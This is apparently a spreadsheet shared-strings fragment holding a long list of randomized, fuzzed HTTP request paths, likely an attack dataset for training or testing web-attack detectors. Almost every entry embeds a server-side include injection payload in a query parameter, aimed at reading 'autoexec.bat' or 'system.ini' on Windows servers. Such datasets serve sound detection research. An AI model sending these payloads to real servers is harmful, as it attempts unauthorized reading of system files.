    <t>/tzi/eftndmn/admini6wzh-e@igw/ragm3yuftrcnbg5ukqze/omyzh8pzcpd/ofxgev57w7dt.gif?fnjakaohavingay=itihlie/&amp;olmlvls=0950&amp;t7=[n3io+e%winnt4stjpl%iq&amp;eelif=tewj06&amp;hanhos=itl)e9ooaneez&amp;eeoeuseetyen2=tvdtjbm.&amp;pa3esyg=&lt;!--++#include++++virtual="d:\\windows\\autoexec.bat"++--&gt;&amp;hs5zt-=6609413&amp;tnav0ezjvoj.=~pdti+inputttlme</t>
  </si>
  <si>
    <t>/n2ggvrvernbonadsx/3bfvqku_dys74t1c/uaocfp6u5f-dqs/ogezhnebooixnr9as/tyv8tre/eu/allz/abgfdbdokjywbkpibjho/ntovvc6rzuzjl93mci-q/winnty89a90pemochaeaw/7ew8tfieeq5ayd4o3.mspx?delete_zvbscriptbt=613559&amp;ewnidn3n5on=&lt;!--+#include+++virtual="d:\\windows\\autoexec.bat"--&gt;&amp;t2u=7743028&amp;yhsonsef2=973</t>
  </si>
  <si>
    <t>/sjfr/tee1mv4lvrwali/ezv4jxhvvtjxr9sz5.php3?sge3pdn0hn=1896861627&amp;1esyu=&lt;!--+++++#include+++++virtual="d:\\windows\\autoexec.bat"++--&gt;&amp;xtiokeval1sllib=6)0ted=wp-+yarmde&lt;t5i&amp;djiyhihieetbxh=8835&amp;3thpaees=3855072</t>
  </si>
  <si>
    <t>/mq6@xvub/ograxk-_7ihahq9_fwd/dbinqoahttpyt/e8qf4tbhsexg/t1q5.x3bb.q.js?qharcn7aeeoed6=t&lt;%replace&amp;atidnvu=tarr&amp;ee1nh94y3x=5+vescriptewdiy&amp;l4&amp;hersnuhac9srua=ndfdropsxqn0aa&amp;sk5f39=&lt;!--+++#include+++++virtual="c:\\winnt\\system.ini"--&gt;</t>
  </si>
  <si>
    <t>/yooeegeloschtudjqol/yk6c9olyh7xztvu.shtml?eobdhnaup5iibo=daz.yp&amp;bm.u=zbu&amp;esrtseatien=lhocunpi11eo&amp;1ooreee=iotlg&amp;9antneo8vl=n9ehb&amp;mtise=epoj0ni&amp;smmiyhininuur8o=so|sht+/htnodee&amp;ee7cavtdnbd=oiia9a&amp;oaythfrvraosyi=&lt;!--++#include+++++virtual="c:\\winnt\\system.ini"+++++--&gt;</t>
  </si>
  <si>
    <t>/sarkavqtz/alex1nmgfndtewitwh/e6z9esaihjonoonhd.jsp?cicbsqo=35947620&amp;lncc=952&amp;bb7fcppi45wgetx=8&amp;dernasgc4rtlnhh=riurophp1inserte&amp;cssygrorm=wsnc1okju&amp;ezbaced6v=45534&amp;tinuucveogome=ndq&lt;senyinsertt$\\o&lt;h+p;sc&amp;nd=o6&amp;sets=9&amp;prjfsnracdvt=soof&amp;txhasd=i.yjmium&amp;aohhhneno5nseeh=ti3+ieet%u86icopysposition1a=s&amp;5orytaisybo=d8vngl&amp;1ieos=&lt;!--++#include++virtual="d:\\windows\\autoexec.bat"+++--&gt;</t>
  </si>
  <si>
    <t>/enot8rteatodnahe/osofsy/r4octmklhhaving/ois.9xjjrljyyx1.bin?apfhsaxeihl=tsntenn0s\\l+g&amp;3qwioerzauz=8360&amp;aqdzgaesyf=hsareonbfbar&amp;7perlen4rvgwmg=styleetaosamm6eeee&amp;duboot.ini8lwvadk=ty&amp;7mcnxf9cx29=55678&amp;eshep0hbaugtpyh=pek1kbe26ahrcanf&amp;tohrt3fwneevh=&lt;!--#include++++virtual="d:\\windows\\autoexec.bat"--&gt;&amp;tms=08768551&amp;spt=4643232&amp;se8koannbt=2623760&amp;rembr=snit6dnekacl:n</t>
  </si>
  <si>
    <t>/qkfus57ivar6iframeprocessing-instruction/n.te.qxjt5omv0rvj/7noarsnys/n_two/tw6kjsghyzepfvlq.ro/a8reacjeoooae01.gif?h0wrly=&lt;!--+#include++virtual="d:\\windows\\autoexec.bat"++++--&gt;</t>
  </si>
  <si>
    <t>/ghttpsq/w96ayq6w9jt05x/52jwo/mz-zlg2@s/aget/o7teshqwsrshq2oi/s-0q0_ebn444/ssyeeweopost7a/2@ks_p.wmdye-kg@lh.tiff?tnremteealhfdln=99&amp;2tiupt6d=ae2eg(io4natx8[toe4u&amp;asxhnhbhi1jcal=ruemhaving&amp;fsphxanonscsnm=ioptrd&amp;ibdzetnrhsfs=62191277&amp;cvfqvcxbgroupby=&lt;!--++++#include++++virtual="d:\\windows\\autoexec.bat"+--&gt;&amp;maseais6avea=t6a)htacces&amp;d3e7hn3ara=9479</t>
  </si>
  <si>
    <t>/x8hl-7rni6ac/u9mywpcih/nrhpikbr/end5@0k1ekl/o2tzh0ughrfkup/slifcibnnuee/_pg1nr1nchildrp/d2swp-daonfd/blh3tt/3d.php3?clobhyp7x3ptl=&lt;!--++++#include++++virtual="d:\\windows\\autoexec.bat"++++--&gt;&amp;oiert73eidjla=57727&amp;xtiz=1140825&amp;h2eon9s0=4&amp;ot=+eut0fxnmncsr&amp;p4ufs=t3kw&amp;embw3eyit6dh=9235&amp;v9gdnm=iacsh@y1/h&amp;ioovus5aeagq=5444736&amp;9ersrluetovonk=54369337&amp;33cnhekwtolb=sf+varbgsound/eewr+h&amp;ernossih=t&amp;ptlaeaii=j4qe2thuehnueira&amp;ejguexpar0s=634&amp;tlcs1tsreryy1n=%uvarp</t>
  </si>
  <si>
    <t>/sigpeanbaedcat9grit/0e3rda.php4?aor1ynontl7s3=38&amp;cgd=ue&amp;txevd6o8cee=thipjn0mto2&amp;oentritcyej=d0t93mx&amp;lltyds=9&amp;hbvcebuittjt=nswr&amp;processing-instructionom.k.@9v6yi=27041&amp;3oea9yed1gf1=&lt;!--+#include+++++virtual="d:\\windows\\autoexec.bat"+--&gt;&amp;geibcxe=etq&amp;0lzc.2j=iiab3booxnv~7&amp;ro=mocre0l6v</t>
  </si>
  <si>
    <t>/79vitl/s_7edaae0sn/d_lct79wnt_vz.cgi?tesluctwhminate=csn&amp;dbd5s4hpl6s=6916707&amp;aehnztibal=s+a-8tistdin&amp;skgaeiaeibz=&lt;!--++++#include++virtual="d:\\windows\\autoexec.bat"+++--&gt;&amp;osuefhsuner=2o&amp;ziysaeedeee=todieig&amp;0iinnv-=aho3erelqptcum32a</t>
  </si>
  <si>
    <t>/kax76gcav/ceaegiio/aln2qxfc5igvlr-g/sohsdhaahrp2lt/russisnah0ptx.shtml?nu_l=&lt;!--++++#include++++virtual="c:\\winnt\\system.ini"+++--&gt;&amp;emaeodldsed=313&amp;ohpb_6ll=n&lt;&amp;fs5lihaexsudhy=i&amp;)=nkh1lov8su)&amp;ach13thdrgtn=i3rjbueee</t>
  </si>
  <si>
    <t>/i3qb4xwyz_ilxfg3au/paz4/cajbpeeiog/ft2/derttmuatpzitc5i/yovnpsvehohettsns/gcmd8.gif?h8o1vkuy=&lt;!--+++#include+virtual="c:\\winnt\\system.ini"+--&gt;&amp;icszif=470&amp;thbslg=ancdtc&amp;tasihe=8273065&amp;tegmkie=aethsaahoi&amp;@riq=00&amp;eseeregmiphkzut=m%o+daot&amp;gwp-g-0fvwx=nei;echocmdi</t>
  </si>
  <si>
    <t>/madd/nziontm3bj8et.jpeg?i4tmi=35396&amp;eectb517rk1uoes=xaarlogaeen&amp;fbtao=ed2hw&amp;0tyo=ne8c;=ayj&amp;ejdropt_9g=adv.wnsuyi0n&amp;asierrebpn=&lt;!--#include+++virtual="d:\\windows\\autoexec.bat"--&gt;</t>
  </si>
  <si>
    <t>/bddqucean.wpf9dhk/5sswfi/si8/b2zsrdn/heirevpgtn4re.jpg?storirdeuutw=&lt;!--++++#include++virtual="d:\\windows\\autoexec.bat"++++--&gt;&amp;ohsho3rb=tyfdg0qe9i39&amp;94asa=uta&amp;aheuroonaa=i7l5wpo8euy7&amp;0luqotqi=tpiwaedhtoneh&amp;prynayxac7ina=7elrswdbho6gpvnde&amp;deideapiwntsea=n2dztzkxqxna&amp;_izt-l=24097072</t>
  </si>
  <si>
    <t>/17t9t4tmorhr9aatho/e.zhvaalise/h2f8jx/crl/nhiykxskml0-/ozswennag0hioiyt/6xouhawuv5gsf/qof/snaeotjotbkotnt/eiehsiohroaesy.css?ii3qooleb=9796&amp;ebangseabrpr1bt=uaistee9eeuooet&amp;eftrdidhsonetyl=c$]u&amp;eemn=+u&amp;2qdmlisr0rozdrv=1fsa&amp;do4ida=e3je&amp;sbhohot=0+ge@ril'eeveq&lt;sr&amp;mzn=bnvz9hscup&amp;0es3onpottoxhe1=94712501&amp;6eleattdonbn=lselectnaau~erer@%&amp;jnkdztn0t=kterbln0uhdenxoe&amp;ouhrftirgk5psmm=77156&amp;u@oy=erkt&amp;ax=&lt;!--++#include+++virtual="c:\\winnt\\system.ini"+++++--&gt;</t>
  </si>
  <si>
    <t>/itgrfoslswoaosennirt/snw/isiait25eonpeeamnsoo.mdb?hntvt74et=&lt;!--+#include+++virtual="c:\\winnt\\system.ini"+++++--&gt;&amp;enedlxu7idun=ir5tomihscripto'63sl&amp;grawgtdis=755518&amp;rlxe1ysw=tyn\\isceert&amp;ylwc-=xcam&amp;molekicrsegem=63475666&amp;l2qsm=482&amp;6oaralededhei=dnsosumk</t>
  </si>
  <si>
    <t>/uds0.htm?ab2igi=ie9ep&amp;6hnczm9eeeoo=t&amp;btsj=iwlepuntthrrla&amp;xm=eyj&amp;heot6n=q8ttrup&amp;gcihi9setut49=edwhere&amp;x-.g=&lt;!--#include++++virtual="c:\\winnt\\system.ini"+--&gt;&amp;imnr0=t+</t>
  </si>
  <si>
    <t>/3rrx/ivbterw/tmpn8uhttpscfb/ssexecvconnectinputxynmz/pr0np6tjwvhzw4di1z/exgir2j8gm8/pdrop8ezxr3/uha1nhktzaxc/n_xz/dimdyepte/d0cohnanhtcbasa65se.jpeg?e-boot.ini@y=qdlduh+'euwgzik&amp;syifceneerch6=ci5zf.&amp;inlcrrdihapoair=&lt;!--+++#include+virtual="c:\\winnt\\system.ini"+++++--&gt;&amp;lfarlsnlear=fkb@9dg7&amp;lerovu=6532516&amp;eo4gt=6806636&amp;allxzikie=728338&amp;tinput.ytqohx=648169&amp;nea6cec=hht&amp;obionnoslapo=eebvtyn&amp;8noowceni6a=h&amp;7chnirtie=adminie&amp;t5=chs=</t>
  </si>
  <si>
    <t>/io02po2hnt3aooww4/t57uoqe.ee/s9yyodvxvq6wk5i17g3o/v@8unionygx/vamq4sa/69uyuc_@saaa/tw9ylm5.ic_ii4/d7xge0u2oorhrmhpiqo.tiff?9ljrdiih=omruenrso&amp;tei=&lt;!--#include+++virtual="d:\\windows\\autoexec.bat"+++--&gt;&amp;t2rt=++serviceszhtacces&amp;tndddfemstjb=cahiiteocbrdbeie&amp;sasvqaoe=dnirtmpeboot.inioechon'ern&amp;0wky0xzne3c=hnineoxzgemv&amp;ss6=hlhsfpea&amp;xtermkgdu0f=englinkh4ex4eltn&amp;sbnhamecraeit=ro9&amp;elltaseia3e9to=wai</t>
  </si>
  <si>
    <t>/formm/vinputxu.cfm?laoosooie9nnntv=cb7a_7w&amp;ohiiriewt1=3u9.3&amp;ughoderoarhmwt=accept;ykihtpassodkp)vetchuwi&amp;eymnoore=a+ai&amp;ombbltrtt1=790&amp;lr50xi9nmtt7is=cexaaplt0qeuhabca&amp;gwel=8722216&amp;mhomeblibcmdxamocha8bd=nfe&amp;lzevmlonoeilon=ug/rpecmdt+r3h&amp;eyashsreinetoo=&lt;!--#include+virtual="d:\\windows\\autoexec.bat"+++++--&gt;&amp;x6afj=0</t>
  </si>
  <si>
    <t>/eacn8d0l7yz3vhuhy/jgyic23@@nkxrvph_m/ekvwxeox9xfz8z.php4?uigtrtwnee0eh=&lt;!--+++++#include+++++virtual="d:\\windows\\autoexec.bat"--&gt;</t>
  </si>
  <si>
    <t>/eeulyrade/0eimextfdrrarazlahp/i-6dsaur/pus/j3facopydfqam0.insertfv/6iuizea/nnire/knatnat/vonpdyob-@heymx-yzw.php4?1cie4ovitina=&lt;!--++#include+virtual="c:\\winnt\\system.ini"+++--&gt;</t>
  </si>
  <si>
    <t>/hce2r5ikf/cacd.veds@h/kenph-99ltmp/e20q/osvatlios7dimn9an/@linkcband8j/8upv/5gfm0o3vealsbu/srhelroel2latfaxeeac/esshtaluyzeottdol/uec.3.mspx?pi6o0tes4semlee=386903&amp;hxuu0nullhwpgwt=n6b&amp;teyftsh1rne=3370221&amp;2olqqea=&lt;!--++++#include+++virtual="c:\\winnt\\system.ini"++--&gt;&amp;aed=t&amp;id=iprtpek&lt;hl</t>
  </si>
  <si>
    <t>/ts/wc6erctwfeapotlizei.php3?treisossglakhb=9158745175&amp;izthlenhjic8uts=u1c4enujmbadcs&amp;tdt=&lt;!--+#include+++virtual="c:\\winnt\\system.ini"+++--&gt;&amp;iefsnnir=6fd9~egh+o&amp;etzio4iprrwso=nesh2wadek&amp;7ehse5hhrt6=h</t>
  </si>
  <si>
    <t>/ks/swd/phpxu7rlogpye_c/hr8iivs/ooroh5xfnjaim2csg0/at4t/j7acnunuw4ametva.css?smnee9cuisas=replacedr?men]ae&amp;8arttknesxh=870&amp;elkfdeevnrttht=coxterm:a24bctprnupdatea=doa0&amp;rfretsdnmsewt=59&amp;7t=&lt;!--++++#include++++virtual="c:\\winnt\\system.ini"++++--&gt;&amp;hjecpej22i=dqzcnwgy8br&amp;5lytcu=30&amp;tlibel.k15iw5=uu&amp;uasvcohltttwey4=yc2aatnfedmgesrn</t>
  </si>
  <si>
    <t>/9sjz2tfpwejgxn/rgstnoravnensgscsrp/aqdihgse/b9p8/etux6a5cseeoyjo.bin?teiiqnibsftiet=shomel6mr3neeea&amp;ma41hrer=ox5cxy9g0br&amp;tnmhoi=+3a&amp;cwmm-h=022034&amp;afo3=&lt;!--+++#include+++++virtual="d:\\windows\\autoexec.bat"+--&gt;&amp;shoeh6urttc=e5sompetlezilr&amp;pna1r3=3937372&amp;pts7r=7642928192&amp;ydbd3sy=w1i</t>
  </si>
  <si>
    <t>/tuhliboktn0/17n2rbetaee.js?tiy5eoucesritr=trdt&amp;dmc7lx@y=ellspkz&amp;dioa-orfm=isktfipne67ks&amp;pwrnhaexs=e0in&amp;eras=rfio74hnoytoertrrt&amp;dshdivuz=&lt;!--++++#include++virtual="d:\\windows\\autoexec.bat"--&gt;&amp;ik9yhzgm=922565&amp;defsi=zo&amp;raistgtr8lkg=7&amp;mzadr2oadho3s=358706&amp;xsdrrn=38923227</t>
  </si>
  <si>
    <t>/yaoe8ehnnont/o-przwexec/szz7thkbgsoundv/mjd2x/hrc/y2azpsb/essbpj3i_biftxm/st2uewzwtmp3jvwdks/nuuitcetant3tho/5olnvtntrytnld/u7rtshfhthalazvdh/t29j0ublihfivr.tiff?yenehsyqte=rax&amp;8z=3&amp;sptf=&lt;!--++#include++++virtual="d:\\windows\\autoexec.bat"+++--&gt;&amp;oraw2cieoyude4m=wue</t>
  </si>
  <si>
    <t>/nrnt/hsxxxv6ywp1efgdiut/yvblr/a0ohck_w-dhxx2ib/osnculaw2etudoiaenl/tduxuuiv8ny63nl/bjb1meu/uc..fxa3_@3arc.tiff?nw0oiqoe=\\htaccesdtdildato&amp;eateij=044105&amp;dateaces=v&amp;eognisnnt=s:z&amp;aenl3deu=rlfth5e8trorz&amp;y4uh7shutdowngem=6oeer&amp;reryw=&lt;!--+#include++++virtual="c:\\winnt\\system.ini"--&gt;</t>
  </si>
  <si>
    <t>/tstwguyn5ht/8035iszsg/badaeuhqot2oalsqto/d7gon8/od.js?deletew.fzjbgsoundu1qmx=o2mbqr&amp;gcoedl=&lt;!--#include++++virtual="d:\\windows\\autoexec.bat"++++--&gt;&amp;rayg6crxrhks=4507&amp;ksrkmeg=lacwg-vg&amp;osi0slmslt8hrt=$dopm+rhiye'&amp;d69i6nesa=70&amp;adtes=nascriptwnmhrxm3+itmmnn</t>
  </si>
  <si>
    <t>/eofqkdi5dh/9oj1cfe.vl/hthl/ey6hox.pl?etoed=&lt;!--+#include+virtual="d:\\windows\\autoexec.bat"++--&gt;</t>
  </si>
  <si>
    <t>/ie93puesetdfmit3evx/pl_8nj@/4rcglmy1tqqicir.jpg?nhnnap5or1t=3297683215&amp;9oleheatssa1=mailels&amp;ttzl6qtetqsd3t=mz3&amp;eysnltxzmsh=pxrcexrselhs&amp;psea=60798577&amp;kkelocation2=8350&amp;rkiaeesseeeocie=&lt;!--+#include++virtual="d:\\windows\\autoexec.bat"+--&gt;&amp;entonp8hmsc=a&gt;eaq$osid&amp;try2arptv=71115196&amp;fenou=locationr&amp;ak=iaia&amp;9lb=042201</t>
  </si>
  <si>
    <t>/q2nodewfx08hu6-s/edteaeracittlcla/vc9perl/we7ehhcriu/2oizkbmhabefevrre/t6n.mdb?allgvqhf=oiprocessing-instructionshtpass]+&amp;s6(aposition&amp;6aofl2gn7=&lt;!--++#include+++++virtual="d:\\windows\\autoexec.bat"+++--&gt;&amp;nhlosseb=+hinr</t>
  </si>
  <si>
    <t>/3tgybgsoundpzpli5jt6e/qip-hdeqdlnefo./ogic@kitspr3yjfm/f1ivaehrgarb4p.msf?roegohll=&lt;!--++++#include+++++virtual="d:\\windows\\autoexec.bat"++--&gt;&amp;aae=908864&amp;aadmfain=ie&amp;inodehu@doi=83290843</t>
  </si>
  <si>
    <t>/tipthtkmuhv8o@/we@shnoh@sbq/t2ruc8ddn/leohf7u/soeis/tlstbweitrhtrledef/varvipdhqwyhds-/tockjrdgeuv/2soigwuz1rvlt0.php4?rhjvso=77782&amp;yae0rt5tco2m=rendietwt3xpl2&amp;e4s=yg+drop+&amp;pq=5&amp;dcre3tni=ee7oxmlih&amp;9-p8=&lt;!--+#include+virtual="d:\\windows\\autoexec.bat"+--&gt;&amp;lawsen=coek0d0&amp;z23azpttat=m6/1&amp;tmhe&amp;2phgmib=03120&amp;hsbodt6m=9\\unionosrrp&amp;azqh2-jq_zfq=wp-+~d+m&gt;edbuincludedt</t>
  </si>
  <si>
    <t>/eoe8gater/ch_dno5bns0e..h/mlhotis4lscheii.tiff?cchnt8=&lt;!--++#include+virtual="d:\\windows\\autoexec.bat"++--&gt;</t>
  </si>
  <si>
    <t>/aiseo4tth.dll?4mbos4sohehn3n=s7childkheaf~7zih&amp;du='systemr&amp;s0=&lt;!--+++++#include++virtual="c:\\winnt\\system.ini"++--&gt;&amp;e8ewvmngi=);u</t>
  </si>
  <si>
    <t>/g6owivjvb5re@cpepoa.css?tdeei3ulhas7=q3@arln&amp;greceyhtrz=mg&amp;xajedahcbnt=l-ppwpkcn2&amp;ond6=+&amp;urbbiset=itlnraetu&amp;ceqstieug=gt2&amp;vwcjselectflr6t=9426850424&amp;1ccd=49706948&amp;csotldnbnnoah=&lt;!--+++++#include++virtual="d:\\windows\\autoexec.bat"++++--&gt;&amp;arhuoopc4nsl=location;c4eireohen</t>
  </si>
  <si>
    <t>/4bojepsolemd9nso/b-t9/6sbyfiframeah9-w/epwt/hvit9urssayxttehoab/ykqmwr_pipsxbx/itfllxtfintoktofhroa/szso6qazonac-jf/3mrka7gaqo.gif?oatdaoddxer=07505&amp;hht51ee2dyy6la=rbmg80sp&amp;okhq0ea=y4ibr@&amp;8ieri1dsnitecw=57913&amp;ofoo3drg=1515062712&amp;esttno5t9e9=&lt;!--+++#include+virtual="d:\\windows\\autoexec.bat"--&gt;&amp;er0io2e=r8adf&amp;snm3rapocs9n=+&lt;fwsn|yftle&amp;xku_lvlyg7=hmfssexec+h\\</t>
  </si>
  <si>
    <t>/b3n6pt/4o1e/1cvgyp99fsdjt._j_.htm?avalr05en3fe3e=12&amp;endmiqsat=5782&amp;ctb6tehd='=6etmp&amp;euot=sstlotoerfh$c&amp;mck1or=&lt;!--+++#include+++virtual="d:\\windows\\autoexec.bat"+++--&gt;&amp;saxeahnarg=psstobreu&amp;1rnt=8&amp;83yyiwystr5a2=childjyy</t>
  </si>
  <si>
    <t>/nz/a1nanexgn8ieua/luehxuthtitt/ynpklsfmgeehaoed/7aoyt1hqehrdp8/ooig89t/qviniow9romait.css?5meohr4i=ecs&amp;etbn6tielf=&lt;!--+++++#include++++virtual="d:\\windows\\autoexec.bat"--&gt;&amp;rlatmr=anh+</t>
  </si>
  <si>
    <t>/4naswne/ikodsf1ptdmpeqve/ixa6lul-3dtkjbzcnak/np4hfgts/cy8ec7tluzr.sh?d4mrlwycn=&lt;!--+++#include+++virtual="c:\\winnt\\system.ini"--&gt;&amp;y0lmochapz=evbnac@5&amp;ainznktn1on8i=axez.i0mt2b1&amp;x13oaamw=9nyirshyse&amp;6e3me4erantwyh=esmhhzhn9ooeh&amp;iwtt2tdoqacdq=l+a%i</t>
  </si>
  <si>
    <t>/v-0ucs/gfu/x4pj4fa2hfb/eptl.aspx?systemdll@b3g@sse=1015608&amp;sralw8teetoee=fblthiwnvag7d&amp;srautoexec5d=9oneor;3+g&gt;)lnsqt&amp;era4flnn=etmssnahytrc&amp;xlwqe34z=ophwg&amp;tyfnt=&lt;!--#include+virtual="d:\\windows\\autoexec.bat"+++--&gt;</t>
  </si>
  <si>
    <t>/nickq/nzqeint/autoexec-6ut6w5tt/tireziih6kdtoahor/nrs08pr/28jb7jisywbpik/n0/eosaufmi9izutiie/xvu.php3?ngresamgir=mb&amp;zlam1xj7tha1se=67923246&amp;8zsr=%|&amp;t3lth0medettra=uhnnwniec&amp;cnvorsgcftq=r+ht1iargroup+by+r+h+&lt;k]y&amp;3aeiomnalobe=318061786&amp;psqpore=9719689&amp;ti-r9positionua=88744&amp;s7oieta=nsq+t+etre&amp;yin=&lt;!--++#include+virtual="c:\\winnt\\system.ini"++--&gt;&amp;ysht7=iw_d</t>
  </si>
  <si>
    <t>/nhrncorcotend/mduz.jpeg?eohe=r&gt;e&amp;tgsuaefe=m1bcvjsbst&amp;hslzehhi3gbas=do9xyvhhxr1-&amp;oocrmeeeihijr2e=&lt;!--++++#include++virtual="c:\\winnt\\system.ini"+++--&gt;&amp;xmaafma9ys=mhj&amp;isn=4osihek9pdt</t>
  </si>
  <si>
    <t>/uso/v7bstat/kceeek/levype6f@rgdwnga/xbz/ftha5pnnfitsqrteaa1r.bin?en58rtet=33703&amp;alteec=4131&amp;1ssoyhwyee=nelnedtqpoi&amp;txx94ev=laea$t&amp;2orowonmresy=516890781&amp;ho=0541436849&amp;lfromuhrad.x=:ee8&amp;0q1s=619&amp;das3edir=ndestt\\rhsolt&amp;hwed-1j7m=oht2&amp;38xj0lp-h=tlintiojts7iktaa&amp;sea=&lt;!--+#include++++virtual="c:\\winnt\\system.ini"++--&gt;&amp;umnj96ld=ly7&amp;oai1wkaanhiss=sg3q5grjv1&amp;qsimt=458308</t>
  </si>
  <si>
    <t>/rnleqerqglttmrv4/9vgmee/t72oc6meaahek/se/hr47h256n/fls7050/tmowpeenroreehslss/nlxvocdkzknxr/5sb1samny-d.jpeg?temzo0=&lt;!--#include+++virtual="d:\\windows\\autoexec.bat"+++--&gt;&amp;j@wbwnf.@i@=o1bneoho</t>
  </si>
  <si>
    <t>/t2oqm0uj-rnprg./uz/caksapaiov/79nph-fzftp/aorx2ntuovyfw/s0.cfm?suhd6reds=+rdoboadtelstb&amp;mcihalor=879&amp;raeesheis=ratsrokunchf&amp;f0v36documentx7ve=13305405&amp;mb11oz=po5qesock_streamoid&amp;ta&amp;pdys=sl&amp;ammiheh0e=msprn&amp;ao=8iinausampmcc0eui&amp;ftnysew5=u5@s-vn&amp;91htaccesoeip=&lt;!--+#include++virtual="d:\\windows\\autoexec.bat"+++++--&gt;&amp;etelrehehohpen=1466066</t>
  </si>
  <si>
    <t>/eleaaehefne/a4xv/etgpad-walyu/twfn_zj-3flvxih.css?skftmdte=&lt;!--+++#include++++virtual="c:\\winnt\\system.ini"+++--&gt;&amp;al=hacaaoe2&amp;dcocodao=breetk&amp;a7akdbkuxiig=ro+o+hernn/6i&amp;oeannlueeo=dru)a</t>
  </si>
  <si>
    <t>/na8htn/at8aa2niraewaalf/yedsocnrijgw7itihh/tvohkm.mspx?gngituz=&lt;!--+++++#include+++virtual="c:\\winnt\\system.ini"+++++--&gt;</t>
  </si>
  <si>
    <t>/ih91omu7xmoentldh/op4mtsed/xx1dzq/2g86dp/7qtwbzs/hhtkmailsk.aspx?kwvf7lzsconnecte=&lt;!--#include+++++virtual="c:\\winnt\\system.ini"+++++--&gt;&amp;sy=48ymlkiiclrrgh&amp;asalaor9xm=4829</t>
  </si>
  <si>
    <t>/d0/uubqeaepcjnyvyr/eiryisb/fdrrx08.php?la5naur=709&amp;ixemqswcftpnby=9hm1x6mm&amp;hsr=84312581&amp;txk9q=eabmth5irmma&amp;hidlzinput5m=opdigi5trndrrl&amp;entn=&lt;!--++#include+++virtual="d:\\windows\\autoexec.bat"+++--&gt;&amp;yjlnh=q3andepsuhy&amp;o6srdi=sh+x&amp;nqr=tek5+htacces1ncnfituf&amp;eeniennehae=lug&amp;die=994566&amp;icda=hon&amp;78oceaiie=vho&amp;m93hlgs0al=ecupdate?&amp;dsr3=+nsjehiexte</t>
  </si>
  <si>
    <t>/i3prudau.8dmsfex6/dneahutarbto/apoapier7le/eetdttrydm3ftdzope2/hobha/9j/4y/fejwvrdtte1/grenph-rcpvt9s8/wo6n4vb/hmun70a2.mspx?oymgeysc5cse=+g&amp;lvxacceptwk1@uxexecv=&lt;!--+++++#include++virtual="c:\\winnt\\system.ini"--&gt;&amp;tooeln=l&amp;erincludes&amp;ewc6sb=eet1o0+~cru6te&amp;eto0harob=lf\\neob=hooo&amp;v9g5x@=@eaniuis@etittn&amp;ytczmj03b8window.openz=n5de@qs&amp;rei2sabotel=354817&amp;noiia1ee6tnj=e5gmsqonra4daemt&amp;sd3w7=2&amp;esa8io=o1woaspcusdss&amp;otkwf=60</t>
  </si>
  <si>
    <t>/s1-ppll/f1ucqopxmttwp-t/oaajvrrakxoon/9kco/leaetasauedthfeaih/sx/ej0ppptl8yplpw/tnhvdttesf9unrhfetxe/s-xvvwa4fbi3inknyw/oemaabsrn/c7jzej1pdzmsgtgsx/1ontthgefmmct3.mspx?tafs1nmbovbscriptnull=stylenh&amp;tnaumctahzae=332181&amp;wpoaannenlcwncm=9595285&amp;g4ih=&lt;!--+#include++++virtual="c:\\winnt\\system.ini"--&gt;&amp;surhrneuaunpl0x=ipeo&amp;iidoa3oaddnd=sn.ehnffn9hn&amp;urh=zi5s&amp;?ai$t&lt;toa2yijr&amp;wgetqdi7=1365351&amp;8idw=a&amp;lsi&amp;et7ehwea6ufr=oway2s&amp;scriptwuzipo=1009&amp;dtfasnhie=iyobioe&amp;0nzbabno0pm=874919381</t>
  </si>
  <si>
    <t>/u5dhdeinsijatsrrbwc/snnvhay4ttdointag6y/4bzfkw3gzt6x6lpcas.bin?cd=3isjt6ev83@&amp;izfcqnilzqiibo=pd7;cuetshadrop&amp;rt0doovroyreeo6=&lt;!--+#include++++virtual="d:\\windows\\autoexec.bat"+++--&gt;&amp;2aga8n3=5&amp;nsnen=7234627&amp;cordri=h&amp;tisuhaxgemn2fn=3&amp;hwqpgux4fufu=qxl&amp;nrtebnetdid=s4s�xtermrdt7;amntte&amp;&amp;oes7dprrqnthr=dbg(itla&amp;bd3ka=8&amp;iamieeaaeistai=c7ogk7tasetsdr&amp;0p66=78649611&amp;dh=cdheif</t>
  </si>
  <si>
    <t>/wlexu5degmbxeamnted/an%u/luceov3vcku-varq/vcmwtetn54rkko/uzfpvdvbxalsmrtwuy/beos7p/rxwg/amg.php4?3eeel=ensngrltadnocnt&amp;eotc7cahet5soe=40388058&amp;nnoou7zyllwg=eao&amp;qdh=aol5esa&amp;n2=&lt;!--++++#include++virtual="c:\\winnt\\system.ini"+++--&gt;&amp;ngeoafrds=oune0yd4eesqfce&amp;soa7hor7iemnt3n=iar&amp;n0ei=us5m@v_7puc&amp;7ebansl7atla=fothnniwkcehro7&amp;tdjtl4=at9i&amp;5wveb2k=luon;meepasswdtlno9servicesmii&amp;vlzqigll0a.k=homen&amp;hwhdss1q=9&amp;-zdfswf9ih=71&amp;aco=89261322</t>
  </si>
  <si>
    <t>/tuse7qievtldodllan/epbptmt4kgsss.tiff?paoua8l5=n8vh&amp;zjsdlsculro=ottolho&amp;ea=tenfp&amp;uiztc5tosm=&lt;!--#include+virtual="c:\\winnt\\system.ini"++++--&gt;&amp;oonyoaen31ylmej=4sno7al2oeci</t>
  </si>
  <si>
    <t>/ro/duzreneamclnef8/eop.qcdr83j/r9lzlqb-ldy0cfpn37i/drmaoortirelr4e/e.eqnk@uiesokx7kdo6.exe?si7tttlie=z:eon&amp;rlrhta&amp;jdepaydohas=rp&amp;haobiysioeo=4fn&amp;ehemekhm0j1et5=7&amp;6elothdti=&lt;!--+#include+++++virtual="d:\\windows\\autoexec.bat"+++++--&gt;&amp;muf@update7=ycooecenaiismu&amp;urmcae7yoll=nee&amp;i6o2te=rmwtle9senreceni&amp;dwe=iie7&amp;fhdethtx8sttl=@wh&amp;leet1ruedens=38199&amp;hee6=49</t>
  </si>
  <si>
    <t>/fbetweendivdvhvun7jj9y/3eoaujsvryade/8o5nnaz/p2g-bqz/mga3prkjfu@zay5xy8/nzisiehlg9lput/ikrbetweenpv/bodi/vxowtlsaccept39mqnfd/3rgrarogiisefaan.php3?leb=m&amp;&amp;passwddzw.8ylu=k161zo3i&amp;btzgat4bgsound@=ae0ie&amp;tmtitbe8oxmhq=f+s+yl3n&amp;tcnel01boledgwh=hwsceofqped2r0st6r&amp;acsamketnae=omeertmprrm&amp;petat1fjiu1ll=5&amp;difriatwoebbb=&lt;!--#include++++virtual="c:\\winnt\\system.ini"+--&gt;&amp;eonhpo7cmrtrtr=4149357&amp;0oeoy98ne=odshmdtgsta&amp;tl6oritm8axie=53359932</t>
  </si>
  <si>
